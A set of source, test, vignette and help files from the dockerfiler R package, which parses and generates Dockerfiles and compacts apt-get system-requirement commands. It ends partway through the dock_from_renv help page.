  # note that MAINTAINER is deprecated but there
  # for backwards compatibility
  DOCKER_INSTRUCTIONS <- c(
    "#", # for detecting comments
    # "^$", # to capture empty lines
    "FROM", "RUN", "CMD", "EXPOSE", "LABEL", "MAINTAINER", "EXPOSE", "ENV", "ADD", "COPY", "ENTRYPOINT", "VOLUME", "USER", "WORKDIR", "ARG", "ONBUILD", "STOPSIGNAL", "HEALTHCHECK", "SHELL")

  instruction_regex <- paste0(DOCKER_INSTRUCTIONS, collapse = "|")

  # read the dockerfile
  dock_raw <- readLines(path)
  # capture instructions
  m <- gregexpr(paste0("^", instruction_regex), dock_raw)
  # extract the instruction
  instructions <- unlist(lapply(regmatches(dock_raw, m), `[`, 1))
  # find positions
  instr_pos <- which(!is.na(instructions))
  # find how many lines between instructions and last line
  n_lines_between <- diff(c(instr_pos, length(dock_raw))) - 1
  # the last one needs to add 1
  n_lines_between[length(n_lines_between)] <- n_lines_between[length(n_lines_between)] + 1

  dock_lines <- find_line_positions(dock_raw, instr_pos, instr_pos + n_lines_between)

  res <- Dockerfile$new()
  res$Dockerfile <- dock_lines
  res
}

# helper function to craft commands
find_line_positions <- function(x, start, end) {
  indexes <- Map(seq.int, start, end, by = 1)
  cmnds <- lapply(indexes, function(.x) x[.x])
  vapply(cmnds, paste0, character(1), collapse = "\n")
}

test_that("Dockerfile parsing works", {
  dock_file <- system.file("Dockerfile", package = "dockerfiler")
  parsed <- parse_dockerfile(dock_file)

  expect_identical(
    paste0(parsed$Dockerfile,  collapse = "\n"),
    paste0(readLines(dock_file), collapse = "\n")
  )

})

test_that("parse_dockerfile returns a Dockerfile R6 object", {
  dock_file <- system.file("Dockerfile", package = "dockerfiler")
  parsed <- parse_dockerfile(dock_file)

  expect_s3_class(parsed, "Dockerfile")
  expect_s3_class(parsed, "R6")
  # The parsed object should expose the same R6 mutators as a fresh
  # Dockerfile (so users can append to a parsed file without re-creating).
  expect_true(is.function(parsed$RUN))
  expect_true(is.function(parsed$ADD))
})

test_that("parse_dockerfile keeps a multi-line continuation as one logical instruction", {
  tmp <- tempfile(fileext = ".dockerfile")
  on.exit(unlink(tmp), add = TRUE)
  writeLines(
    c(
      "FROM debian:bookworm",
      "RUN apt-get update && \\",
      "    apt-get install -y \\",
      "    libcurl4-openssl-dev"
    ),
    con = tmp
  )

  parsed <- parse_dockerfile(tmp)

  # Two logical instructions: FROM + the multi-line RUN.
  expect_equal(length(parsed$Dockerfile), 2L)
  expect_match(parsed$Dockerfile[1], "^FROM debian:bookworm$")
  expect_match(parsed$Dockerfile[2], "^RUN apt-get update")
  # The continuation lines must remain glued to the RUN instruction.
  expect_match(parsed$Dockerfile[2], "libcurl4-openssl-dev", fixed = TRUE)
})

test_that("parse_dockerfile preserves comment lines as their own logical entries", {
  tmp <- tempfile(fileext = ".dockerfile")
  on.exit(unlink(tmp), add = TRUE)
  writeLines(
    c(
      "FROM alpine:3.19",
      "# install build tools",
      "RUN apk add --no-cache build-base"
    ),
    con = tmp
  )

  parsed <- parse_dockerfile(tmp)

  expect_true(any(grepl("^# install build tools$", parsed$Dockerfile)))
  expect_true(any(grepl("^RUN apk add", parsed$Dockerfile)))
})

#' Compact Sysreqs
#'
#' @param pkg_installs pkg_sysreqs as vector, `pak::pkg_sysreqs` output
#' @param update_cmd command used to update packages, "apt-get update -y" by default
#' @param install_cmd command used to install packages, "apt-get install -y" by default
#' @param clean_cmd command used to clean package folder, "rm -rf /var/lib/apt/lists/*" by default
#'
#' @return vector of compacted command to run to install sysreqs
#' @export
#'
#' @examples
#' pkg_installs <- list("apt-get install -y htop", "apt-get install -y top")
#' compact_sysreqs(pkg_installs)

compact_sysreqs <- function(pkg_installs,
                            update_cmd = "apt-get update -y",
                            install_cmd = "apt-get install -y",
                            clean_cmd ="rm -rf /var/lib/apt/lists/*"){

  # extract everything that starts with the install command
  pkg_ <-  pkg_installs[lapply(pkg_installs,length)!=0]
  apt <-  grepl(pattern = paste0("^",install_cmd),x = pkg_)

  with_apt <- pkg_[apt]
  without_apt <- pkg_[!apt]
  # we choose to not compact unusals sysreqs
  without_apt_out <- unlist(without_apt)

if ( length(without_apt_out) > 0 && isTRUE( all(without_apt_out != "")) ){
  without_apt_out[1] <- paste(update_cmd,     "&&", without_apt_out[1] )
  without_apt_out[length(without_apt_out)] <- paste( without_apt_out[length(without_apt_out)],"&&",clean_cmd)
} else {
  without_apt_out <- NULL
}


  compact <- paste(
    unique(unlist(strsplit(gsub(
      with_apt,
      pattern = install_cmd,
      replacement = ""
    ),split = " "))),
    collapse = " "
  )
  if (compact != "") {
    apt_out <- paste(
      update_cmd,
      "&&",
      install_cmd,
      compact,
      "&&",
      clean_cmd
    )
  }else { apt_out <-NULL}

 out<- unlist(c(apt_out,without_apt_out))




  out
}

test_that("compact_sysreqs works", {
  pkg_installs <-
    list("apt-get install -y htop", "apt-get install -y top")
  expect_equal(
    compact_sysreqs(pkg_installs),
    "apt-get update -y && apt-get install -y  htop top && rm -rf /var/lib/apt/lists/*"
  )
})
test_that("empty compact_sysreqs works", {
  pkg_installs <-
    list("")
  expect_equal(
    compact_sysreqs(pkg_installs),
    NULL
  )

  pkg_installs <-
NULL
  expect_equal(
    compact_sysreqs(pkg_installs),
    NULL
  )




})

test_that("compact_sysreqs works with chromote", {
  pkg_installs  <- list(character(0), character(0), character(0), character(0),
                        character(0), "apt-get install -y make", character(0), c("[ $(which google-chrome) ] || apt-get install -y gnupg curl",
                                                                                 "[ $(which google-chrome) ] || curl -fsSL -o /tmp/google-chrome.deb https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb",
                                                                                 "[ $(which google-chrome) ] || DEBIAN_FRONTEND='noninteractive' apt-get install -y /tmp/google-chrome.deb",
                                                                                 "apt-get install -y make libssl-dev libcurl4-openssl-dev"
                        ), character(0), character(0), character(0), character(0),
                        character(0), "apt-get install -y libcurl4-openssl-dev libssl-dev",
                        character(0), character(0), character(0), character(0), "apt-get install -y make",
                        character(0), "apt-get install -y make zlib1g-dev", character(0),
                        character(0), "apt-get install -y make zlib1g-dev", character(0),
                        character(0), character(0), character(0), character(0), character(0),
                        character(0), character(0), character(0), character(0), character(0),
                        "apt-get install -y git", character(0), character(0), "apt-get install -y make",
                        "apt-get install -y make zlib1g-dev", character(0), "apt-get install -y make libssl-dev",
                        character(0), character(0), character(0))



  expect_equal(
    compact_sysreqs(pkg_installs),
    c("apt-get update -y && apt-get install -y  make libcurl4-openssl-dev libssl-dev zlib1g-dev git && rm -rf /var/lib/apt/lists/*",
      "apt-get update -y && [ $(which google-chrome) ] || apt-get install -y gnupg curl",
      "[ $(which google-chrome) ] || curl -fsSL -o /tmp/google-chrome.deb https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb",
      "[ $(which google-chrome) ] || DEBIAN_FRONTEND='noninteractive' apt-get install -y /tmp/google-chrome.deb",
      "apt-get install -y make libssl-dev libcurl4-openssl-dev && rm -rf /var/lib/apt/lists/*"
    )
  )
})

#' A Dockerfile template
#'
#' @export
#' @importFrom R6 R6Class
#' @examples
#' my_dock <- Dockerfile$new()
Dockerfile <- R6::R6Class(
"Dockerfile",
public = list(
#' @field Dockerfile The dockerfile content.
Dockerfile = character(),
#' @description
#' Create a new Dockerfile object.
#' @param FROM The base image. Default `"rocker/r-base"`. (Note: the
#'   high-level generators [dock_from_desc()] and [dock_from_renv()]
#'   use a different default, `rocker/r-ver` tagged with your R
#'   version.)
#' @param AS Optional build-stage name (`FROM ... AS <name>`). Default
#'   `NULL` (no `AS`).
#' @return A Dockerfile object.
initialize = function(FROM = "rocker/r-base",
AS = NULL) {
self$Dockerfile <- create_dockerfile(FROM, AS)
},
#' @description
#' Add a RUN command.
#' @param cmd The command to add.
#' @return the Dockerfile object, invisibly.
RUN = function(cmd) {
self$Dockerfile <- c(self$Dockerfile, add_run(cmd))
},
#' @description
#' Add a ADD command.
#' @param from The source file.
#' @param to The destination file.
#' @param force If TRUE, overwrite the destination file.
#' @return the Dockerfile object, invisibly.
ADD = function(from, to, force = TRUE) {
self$Dockerfile <- c(self$Dockerfile, add_add(from, to, force))
},
#' @description
#' Add a COPY command.
#' @param from The source file.
#' @param to The destination file.
#' @param force If TRUE, overwrite the destination file.
#' @param stage Optional. Name of the build stage (e.g., `"builder"`) to copy files from. This corresponds to the `--from=` part in a Dockerfile COPY instruction (e.g., `COPY --from=builder /source /dest`). If `NULL`, the `--from=` argument is omitted.
#' @return the Dockerfile object, invisibly.
COPY = function(from, to, stage= NULL , force = TRUE) {
self$Dockerfile <- c(self$Dockerfile, add_copy(from, to, stage, force))
},
#' @description
#' Add a WORKDIR command.
#' @param where The working directory.
#' @return the Dockerfile object, invisibly.
WORKDIR = function(where) {
self$Dockerfile <- c(self$Dockerfile, add_workdir(where))
},
#' @description
#' Add a EXPOSE command.
#' @param port The port to expose.
#' @return the Dockerfile object, invisibly.
EXPOSE = function(port) {
self$Dockerfile <- c(self$Dockerfile, add_expose(port))
},
#' @description
#' Add a VOLUME command.
#' @param volume The volume to add.
#' @return the Dockerfile object, invisibly.
VOLUME = function(volume) {
self$Dockerfile <- c(self$Dockerfile, add_volume(volume))
},
#' @description
#' Add a CMD command.
#' @param cmd The command to add.
#' @return the Dockerfile object, invisibly.
CMD = function(cmd) {
self$Dockerfile <- c(self$Dockerfile, add_cmd(cmd))
},
#' @description
#' Add a LABEL command.
#' @param key,value The key and value of the label.
#' @return the Dockerfile object, invisibly.
LABEL = function(key, value) {
self$Dockerfile <- c(self$Dockerfile, add_label(key, value))
},
#' @description
#' Add an ENV command.
#' @param key,value The key and value of the environment variable.
#' @return the Dockerfile object, invisibly.
ENV = function(key, value) {
self$Dockerfile <- c(self$Dockerfile, add_env(key, value))
},
#' @description
#' Add a ENTRYPOINT command.
#' @param cmd The command to add.
#' @return the Dockerfile object, invisibly.
ENTRYPOINT = function(cmd) {
self$Dockerfile <- c(self$Dockerfile, add_entrypoint(cmd))
},
#' @description
#' Add a USER command.
#' @param user The user to add.
#' @return the Dockerfile object, invisibly.
USER = function(user) {
self$Dockerfile <- c(self$Dockerfile, add_user(user))
},
#' @description
#' Add a ARG command.
#' @param arg The argument to add.
#' @param ahead If TRUE, add the argument at the beginning of the Dockerfile.
#' @param default Optional default value. When not `NULL`, the directive
#'   becomes `ARG <arg>=<default>`. Requires `arg` to be just the name
#'   (no embedded `=`); supplying both an inlined `=` in `arg` and a
#'   non-`NULL` `default` errors.
#' @return the Dockerfile object, invisibly.
ARG = function(arg, ahead = FALSE, default = NULL) {
if (ahead) {
self$Dockerfile <- c(add_arg(arg, default = default), self$Dockerfile)
} else {
self$Dockerfile <- c(self$Dockerfile, add_arg(arg, default = default))
}
},
#' @description
#' Add a ONBUILD command.
#' @param cmd The command to add.
#' @return the Dockerfile object, invisibly.
ONBUILD = function(cmd) {
self$Dockerfile <- c(self$Dockerfile, add_onbuild(cmd))
},
#' @description
#' Add a STOPSIGNAL command.
#' @param signal The signal to add.
#' @return the Dockerfile object, invisibly.
STOPSIGNAL = function(signal) {
self$Dockerfile <- c(self$Dockerfile, add_stopsignal(signal))
},
#' @description
#' Add a HEALTHCHECK command.
#' @param check The check to add.
#' @return the Dockerfile object, invisibly.
HEALTHCHECK = function(check) {
self$Dockerfile <- c(self$Dockerfile, add_healthcheck(check))
},
#' @description
#' Add a SHELL command.
#' @param shell The shell to add.
#' @return the Dockerfile object, invisibly.
SHELL = function(shell) {
self$Dockerfile <- c(self$Dockerfile, add_shell(shell))
},
#' @description
#' Add a MAINTAINER command.
#' @param name,email The name and email of the maintainer.
#' @return the Dockerfile object, invisibly.
MAINTAINER = function(name, email) {
self$Dockerfile <- c(self$Dockerfile, add_maintainer(name, email))
},
#' @description
#' Add a custom command.
#' @param base,cmd The base and command to add.
#' @return the Dockerfile object, invisibly.
custom = function(base, cmd) {
self$Dockerfile <- c(self$Dockerfile, add_custom(base, cmd))
},
#' @description
#' Add a comment.
#' @param comment The comment to add.
#' @return the Dockerfile object, invisibly.
COMMENT = function(comment) {
self$Dockerfile <- c(self$Dockerfile, add_comment(comment))
},
#' @description
#' Print the Dockerfile.
#' @return used for side effect
print = function() {
cat(self$Dockerfile, sep = "\n")
},
#' @description
#' Write the Dockerfile to a file.
#' @param as The file to write to.
#' @param append boolean, if TRUE append to file.
#' @return used for side effect
write = function(as = "Dockerfile", append = FALSE) {
base::write(self$Dockerfile, file = as, append = append)
},
#' @description
#' Switch commands.
#' @param a,b The commands to switch.
#' @return the Dockerfile object, invisibly.
switch_cmd = function(a, b) {
self$Dockerfile <- switch_them(self$Dockerfile, a, b)
},
#' @description
#' Remove a command.
#' @param where The commands to remove.
#' @return the Dockerfile object, invisibly.
remove_cmd = function(where) {
self$Dockerfile <- remove_from(self$Dockerfile, where)
},
#' @description
#' Add a command after another.
#' @param cmd The command to add.
#' @param after Where to add the cmd
#' @return the Dockerfile object, invisibly.
add_after = function(cmd, after) {
self$Dockerfile <- add_to(self$Dockerfile, cmd, after)
}
)
)

test_that("Dockerfile COPY with build stage works correctly", {
  # Création des deux étapes du Dockerfile
  stage_1 <- Dockerfile$new(FROM = "alpine", AS = "builder")
  stage_1$RUN('echo "coucou depuis le builder" > /coucou')

  stage_2 <- Dockerfile$new(FROM = "ubuntu")
  stage_2$COPY(from = "/coucou", to = "/truc.txt", force = TRUE, stage = "builder")
  stage_2$RUN("cat /truc.txt")

  tmpfile <- tempfile(fileext = ".Dockerfile")
  stage_1$write(as = tmpfile)
  stage_2$write(as = tmpfile, append = TRUE)

  docker_lines <- readLines(tmpfile)

  expect_length(docker_lines, 5)

  expect_equal(docker_lines[1], "FROM alpine AS builder")
  expect_equal(docker_lines[2], 'RUN echo "coucou depuis le builder" > /coucou')
  expect_equal(docker_lines[3], "FROM ubuntu")
  expect_equal(docker_lines[4], "COPY --from=builder /coucou /truc.txt")
  expect_equal(docker_lines[5], "RUN cat /truc.txt")

  expect_true(any(grepl("COPY --from=builder", docker_lines)))
  expect_true(any(grepl("/coucou", docker_lines)))
  expect_true(any(grepl("/truc.txt", docker_lines)))
})

expect_captured_length <- function(x, length) {
  expect_equal(length(capture.output(x)), length)
}

test_that("R6 creation works", {
  my_dock <- Dockerfile$new()
  expect_s3_class(my_dock, "R6")
  expect_s3_class(my_dock, "Dockerfile")
  my_dock$RUN("mkdir /usr/scripts")
  expect_captured_length(my_dock, 2)
  my_dock$ADD("from", "/usr/scripts")
  expect_captured_length(my_dock, 3)
  my_dock$COPY("from", "/usr/scripts")
  expect_captured_length(my_dock, 4)
  my_dock$WORKDIR("/usr/scripts")
  expect_captured_length(my_dock, 5)
  my_dock$EXPOSE(888)
  expect_captured_length(my_dock, 6)
  my_dock$VOLUME(" /usr/scripts")
  expect_captured_length(my_dock, 7)
  my_dock$CMD(" /usr/scripts")
  expect_captured_length(my_dock, 8)
  my_dock$LABEL("plop", "/usr/scripts")
  expect_captured_length(my_dock, 9)
  my_dock$ENV("plop", " /usr/scripts")
  expect_captured_length(my_dock, 10)
  my_dock$ENTRYPOINT("plop  /usr/scripts")
  expect_captured_length(my_dock, 11)
  my_dock$USER("plop  /usr/scripts")
  expect_captured_length(my_dock, 12)
  my_dock$ARG("plop /usr/scripts")
  expect_captured_length(my_dock, 13)
  my_dock$ONBUILD("plop /usr/scripts")
  expect_captured_length(my_dock, 14)
  my_dock$STOPSIGNAL("plop /usr/scripts")
  expect_captured_length(my_dock, 15)
  my_dock$HEALTHCHECK("plop /usr/scripts")
  expect_captured_length(my_dock, 16)
  my_dock$MAINTAINER("colin", "contact@colinfay.me")
  expect_captured_length(my_dock, 17)
  my_dock$SHELL("plop /usr/scripts")
  expect_captured_length(my_dock, 18)
  my_dock$remove_cmd(1)
  expect_captured_length(my_dock, 17)
  my_dock$switch_cmd(5, 6)
  expect_captured_length(my_dock, 17)
  my_dock$COMMENT("Just testing Dockerfile comments.")
  expect_captured_length(my_dock, 18)

  my_dock <- Dockerfile$new(FROM = "plop")
  expect_match(my_dock$Dockerfile, "plop")
  my_dock <- Dockerfile$new(FROM = "plop", AS = "pouet")
  expect_match(my_dock$Dockerfile, "plop")
  expect_match(my_dock$Dockerfile, "pouet")
})

test_that("warning works", {
  my_dock <- Dockerfile$new()
  # expect_warning(my_dock$COPY("nfi", "norifi", force = FALSE))
  expect_warning(my_dock$EXPOSE("9000"))
})

test_that("dock$ARG emits ARG <name> when no default is provided", {
  my_dock <- Dockerfile$new(FROM = "plop")
  my_dock$ARG("MYVAR")
  expect_true(any(grepl("^ARG MYVAR$", my_dock$Dockerfile)))
})

test_that("dock$ARG emits ARG <name>=<default> when a default is provided", {
  my_dock <- Dockerfile$new(FROM = "plop")
  my_dock$ARG("MYVAR", default = "myval")
  expect_true(any(grepl("^ARG MYVAR=myval$", my_dock$Dockerfile)))
})

test_that("dock$ARG default still respects ahead = TRUE", {
  my_dock <- Dockerfile$new(FROM = "plop")
  my_dock$RUN("placeholder")
  my_dock$ARG("MYVAR", ahead = TRUE, default = "myval")
  # FROM stays first; ARG is inserted before everything else (i.e. before
  # the FROM as well, because that's how `ahead = TRUE` is currently
  # implemented). We only assert the ARG line is present and well-formed.
  expect_true(any(my_dock$Dockerfile == "ARG MYVAR=myval"))
})

test_that("add_arg emits the right directive in both modes", {
  expect_equal(as.character(dockerfiler:::add_arg("MYVAR")), "ARG MYVAR")
  expect_equal(
    as.character(dockerfiler:::add_arg("MYVAR", default = "myval")),
    "ARG MYVAR=myval"
  )
})

test_that("add_arg errors when both `arg` contains `=` and `default` is supplied", {
  # Avoids producing the silently invalid `ARG MYVAR=oldval=newval`.
  expect_error(
    dockerfiler:::add_arg("MYVAR=oldval", default = "newval"),
    "already contains an `=` sign"
  )
  # Either form is fine on its own.
  expect_no_error(dockerfiler:::add_arg("MYVAR=oldval"))
  expect_no_error(dockerfiler:::add_arg("MYVAR", default = "newval"))
})

test_that("legacy inlined form `dock$ARG(\"NAME=value\")` keeps emitting `ARG NAME=value`", {
  # Backward-compat regression test: callers who pre-date the `default`
  # parameter must see the same output as before.
  my_dock <- Dockerfile$new(FROM = "plop")
  my_dock$ARG("MYVAR=myval")
  expect_true(any(my_dock$Dockerfile == "ARG MYVAR=myval"))
  expect_equal(
    as.character(dockerfiler:::add_arg("MYVAR=myval")),
    "ARG MYVAR=myval"
  )
})

test_that("dock$custom appends `<base> <cmd>` verbatim", {
  my_dock <- Dockerfile$new(FROM = "plop")
  my_dock$custom(base = "ONBUILD", cmd = "RUN echo hi")
  expect_true(any(my_dock$Dockerfile == "ONBUILD RUN echo hi"))
})

test_that("dock$add_after inserts a command at the requested position", {
  my_dock <- Dockerfile$new(FROM = "plop")
  my_dock$RUN("first")
  my_dock$RUN("third")
  my_dock$add_after(cmd = "RUN second", after = 2)
  expect_equal(my_dock$Dockerfile[3], "RUN second")
  expect_equal(my_dock$Dockerfile[2], "RUN first")
  expect_equal(my_dock$Dockerfile[4], "RUN third")
})

test_that("r works", {
  a <- r(install.packages("attempt", repo = "http://cran.irsn.fr/"))
  expect_s3_class(a, "glue")
  expect_s3_class(a, "character")
  expect_match(a, "install.packages")
})

test_that("r preserves digits and structure", {
  out <- r(c(1, 2, 3))
  expect_equal(as.character(out), "R -e 'c(1, 2, 3)'")

  out <- r(seq(1, 20, by = 2))
  expect_equal(as.character(out), "R -e 'seq(1, 20, by = 2)'")
})

test_that("r preserves spaces inside string literals", {
  out <- r(cat("a  b"))
  expect_equal(as.character(out), 'R -e \'cat("a  b")\'')
})

test_that("r escapes apostrophes inside string literals so the shell receives intact code", {
  out <- r(message("don't"))
  expect_equal(
    as.character(out),
    "R -e \"message(\\\"don't\\\")\""
  )

  tf <- tempfile()
  on.exit(unlink(tf), add = TRUE)
  writeLines(
    paste0(
      "set -- ",
      as.character(out),
      "; for a; do printf \"%s\\n\" \"$a\"; done"
    ),
    con = tf
  )
  shelled <- system2(command = "sh", args = tf, stdout = TRUE, stderr = TRUE)
  expect_equal(
    shelled,
    c("R", "-e", "message(\"don't\")")
  )
})

test_that("r normalises deparse line-wrap indentation on long expressions", {
  long_call <- r(install.packages(
    c("aaa", "bbb", "ccc", "ddd", "eee", "fff", "ggg", "hhh", "iii",
      "jjj", "kkk", "lll", "mmm", "nnn", "ooo", "ppp"),
    repos = "https://example.com/very/long/path/that/forces/wrap/"
  ))
  # Indentation runs from deparse() must collapse to a single space.
  expect_false(grepl("  ", as.character(long_call), fixed = TRUE))
  # And the call must remain valid R when re-parsed.
  unwrapped <- sub("^R -e '(.+)'$", "\\1", as.character(long_call))
  expect_silent(parse(text = unwrapped))
})

---
title: "Getting started with dockerfiler"
author: "Colin Fay"
date: "`r Sys.Date()`"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Getting started with dockerfiler}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r setup, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

# dockerfiler

Easy Dockerfile Creation from R.

## Installation

You can install dockerfiler from GitHub with:

```{r gh-installation, eval = FALSE}
# install.packages("remotes")
remotes::install_github("ThinkR-open/dockerfiler")
```

Or from CRAN with : 

```{r, eval = FALSE}
install.packages("dockerfiler")
```

## Basic workflow

By default, `Dockerfile$new()` creates a Dockerfile with `FROM "rocker/r-base"`.
(The high-level generators `dock_from_desc()` and `dock_from_renv()` use a
different default: `rocker/r-ver` tagged with your R version; see below.)

You can set another FROM in `new()`

```{r}
library(dockerfiler)
# Create a dockerfile template
my_dock <- Dockerfile$new()
my_dock$MAINTAINER("Colin FAY", "contact@colinfay.me")
```

Wrap your raw R Code inside the `r()` function to turn it into a bash command with `R -e`.

```{r}
my_dock$RUN(r(install.packages("attempt", repos = "https://cloud.r-project.org")))
```

Classical Docker stuffs:

```{r}
my_dock$RUN("mkdir /usr/scripts")
my_dock$RUN("cd /usr/scripts")
my_dock$COPY("plumberfile.R", "/usr/scripts/plumber.R")
my_dock$COPY("torun.R", "/usr/scripts/torun.R")
my_dock$EXPOSE(8000)
my_dock$CMD("Rscript /usr/scripts/torun.R ")
```

See your Dockerfile : 

```{r}
my_dock
```

If you've made a mistake in your script, you can switch lines with the `switch_cmd` method. This function takes as arguments the positions of the two cmd you want to switch : 

```{r}
# Switch line 8 and 7
my_dock$switch_cmd(8, 7)
my_dock
```

You can also remove a cmd with `remove_cmd`: 

```{r}
my_dock$remove_cmd(8)
my_dock
```

This also works with a vector:

```{r}
my_dock$remove_cmd(5:7)
my_dock
```

`add_after` add a command after a given line. 

```{r}
my_dock$add_after(
  cmd = "RUN R -e 'remotes::install_cran(\"rlang\")'", 
  after = 3
)
```


Save your Dockerfile:

```{r eval = FALSE}
my_dock$write()
```

## Create a Dockerfile from a DESCRIPTION

You can use a DESCRIPTION file to create a Dockerfile that installs the dependencies and the package.

```{r, eval = FALSE}
my_dock <- dock_from_desc("DESCRIPTION")

my_dock$CMD(r(library(dockerfiler)))

my_dock$add_after(
  cmd = "RUN R -e 'remotes::install_cran(\"rlang\")'",
  after = 3
)
```

`dock_from_desc()` defaults to `FROM rocker/r-ver:<your R version>` and
pulls Linux binaries from Posit Public Package Manager
(`https://p3m.dev/cran/latest`). Pass `FROM = "rocker/r-base"` or
`repos = c(CRAN = "https://cran.rstudio.com/")` to opt out.

## Create a Dockerfile from a renv.lock

If your project uses `{renv}`, `dock_from_renv()` turns the `renv.lock`
into a Dockerfile that restores the exact pinned versions.

```{r, eval = FALSE}
my_dock <- dock_from_renv(lockfile = "renv.lock")
my_dock
```

By default the generated Dockerfile is `FROM rocker/r-ver:<your R version>`
(multi-arch amd64 + arm64), pulls Linux binaries from Posit Public Package
Manager, and runs the container as the non-root `rstudio` user. Pass
`FROM = "rocker/r-base"`, `repos = c(CRAN = "https://cran.rstudio.com/")`,
or `user = NULL` to restore the previous behaviour.

## Parse an existing Dockerfile

Already have a Dockerfile? `parse_dockerfile()` reads it back into a
`Dockerfile` object you can edit and re-`$write()`.

```{r, eval = FALSE}
my_dock <- parse_dockerfile("Dockerfile")
my_dock
my_dock$RUN(r(library(dockerfiler)))
my_dock$write("Dockerfile")
```

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/dockerignore.R
\name{docker_ignore_add}
\alias{docker_ignore_add}
\title{Create a dockerignore file}
\usage{
docker_ignore_add(path)
}
\arguments{
\item{path}{Where to write the file}
}
\value{
The path to the \code{.dockerignore} file, invisibly.
}
\description{
Create a dockerignore file
}
\examples{
\dontrun{
  docker_ignore_add()
}
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/dock_from_renv.R
\name{dock_from_renv}
\alias{dock_from_renv}
\title{Create a Dockerfile from an \code{renv.lock} file}
\usage{
dock_from_renv(
  lockfile = "renv.lock",
  distro = NULL,
  FROM = "rocker/r-ver",
  AS = NULL,
  sysreqs = TRUE,
  repos = c(CRAN = "https://p3m.dev/cran/latest"),
  expand = FALSE,
  extra_sysreqs = NULL,
  use_pak = FALSE,
  user = "rstudio",
  dependencies = NA,
  sysreqs_platform = "ubuntu",
  renv_version,
  github_pat = c("none", "build_arg", "secret"),
  renv_paths_cache = NULL
)
}
\arguments{
\item{lockfile}{Path to an \code{renv.lock} file to use as an input.
The \code{basename(lockfile)} must be located at the docker build
context root at \verb{docker build} time, because the generated
Dockerfile emits \verb{COPY <basename(lockfile)> renv.lock}. Validated
as a single string whose basename contains only alphanumerics,
dots, underscores or hyphens (no spaces or shell metacharacters).}

\item{distro}{\itemize{
\item deprecated - only debian/ubuntu based images are supported
}}

\item{FROM}{Docker image to start FROM. Default is \code{"rocker/r-ver"},
which is multi-arch (linux/amd64 + linux/arm64) and gets the
lockfile's R version appended at codegen time (e.g.
\verb{rocker/r-ver:4.5.0}). Pass an already-tagged or
already-digested reference (\verb{rocker/r-ver:4.4.1},
\code{rocker/r-base@sha256:...}) to override the auto-tag; the user's
tag is honoured verbatim, even if it differs from the lockfile's
\code{R$Version}. R-devel and release-candidate users whose lockfile
records \code{r-devel} or \verb{4.5.0-RC} may want to pass an explicit
tag like \code{FROM = "rocker/r-ver:devel"} to control which base
image is pulled.
Validated as a Docker image reference
(\verb{<host>[:<port>]/<image>[:<tag>][@sha256:<hex>]}); other values
raise an error to prevent shell-metacharacter injection into the
generated FROM directive.}

\item{AS}{The AS of the Dockerfile. Default is \code{NULL}. When non-NULL,
validated as a simple build-stage name (\verb{^[a-zA-Z0-9][a-zA-Z0-9._-]*$}).}

\item{sysreqs}{boolean. If \code{TRUE}, the Dockerfile will contain sysreq installation.}

\item{repos}{character. The URL(s) of the repositories to use for
\code{options("repos")}. Default is
\code{c(CRAN = "https://p3m.dev/cran/latest")} (Posit Public Package
Manager). When the URL is recognized as a PPM host
(\code{packagemanager.posit.co}, \code{packagemanager.rstudio.com}, or
\code{p3m.dev}), the codegen rewrites it to the
\verb{__linux__/$VERSION_CODENAME/} shape so the build pulls Linux
binaries (5-10x faster than building from source). Each value
must look like an http(s) URL (no quotes, spaces or newlines);
each name (when set) must be a simple identifier
(\verb{^[A-Za-z][A-Za-z0-9._-]*$}). Other values raise an error to
prevent injection into the generated \verb{echo "options(...)"} shell
command.}

\item{expand}{boolean. If \code{TRUE} each system requirement will have its own \code{RUN} line.}

\item{extra_sysreqs}{character vector. Extra debian system requirements.
Will be installed with apt-get install. Each entry must be a Debian
package name (\verb{^[a-z0-9][a-z0-9.+-]+$}); other values raise an error
to prevent injection into the generated apt-get RUN.}

\item{use_pak}{boolean. If \code{TRUE} use pak to deal with dependencies
during \code{renv::restore()}. FALSE by default. Must be a single
\code{TRUE} or \code{FALSE} (no \code{NA}, no vector).}

\item{user}{Name of the user the runtime container drops privilege
to before the \code{renv::restore()} step (and therefore at runtime).
Default is \code{"rstudio"} so the generated image runs as a non-root
user out of the box, which is the recommended security posture.

The Dockerfile is emitted in two halves: every step that needs
root (apt-get, R install commands, \code{chown} of the renv cache)
runs first; then a \verb{USER <user>} directive drops privilege; then
the \code{renv::restore()} cache-mount RUN happens.

To make this work regardless of the FROM image, the package
emits a defensive \verb{RUN id -u <user> >/dev/null 2>&1 || useradd -m -d /home/<user> -s /bin/bash <user>} early. On
rocker/* images the \code{useradd} is a no-op (the user already
exists); on \code{r-base}, \verb{ubuntu:*}, \verb{debian:*} it creates the user
with the standard home directory.

Pass \code{user = NULL} to opt out: no \code{USER} directive is emitted
and the container runs as root (the previous behaviour).
Pass any other string to use that user instead of \code{rstudio}.
Custom homes (e.g. \verb{/srv/myapp}) require also passing an
explicit \code{renv_paths_cache}.

debian/ubuntu images only (\code{useradd} is the standard form);
for alpine-based images you must pass \code{user = NULL} and handle
user creation yourself with the alpine-native \code{adduser}.

The argument is validated at codegen time against
\verb{^[a-zA-Z_][a-zA-Z0-9_-]\{0,31\}$} (POSIX-style username, max 32
chars, no shell metacharacters). Other values raise an error
to prevent metacharacter injection into the generated \code{RUN}
commands.}

\item{dependencies}{What kinds of dependencies to install. Most commonly
one of the following values:
\itemize{
\item \code{NA}: only required (hard) dependencies,
\item \code{TRUE}: required dependencies plus optional and development
dependencies,
\item \code{FALSE}: do not install any dependencies. (You might end up with a
non-working package, and/or the installation might fail.)
}}

\item{sysreqs_platform}{System requirements platform.\code{ubuntu} by default. If \code{NULL}, then the  current platform is used. Can be : "ubuntu-22.04" if needed to fit with the \code{FROM} Operating System. Only debian or ubuntu based images are supported}

\item{renv_version}{character or \code{NULL}. The renv version to install.
The argument has three distinct modes, deliberately encoded with
the missing-vs-\code{NULL} distinction:
\itemize{
\item \strong{not supplied (default)}: read the renv version from the
\code{renv.lock} file. If the lockfile does not pin renv either,
the latest available version is installed.
\item \code{NULL} (explicit): always install the latest renv from the
configured repos, even when the lockfile pins a specific
version.
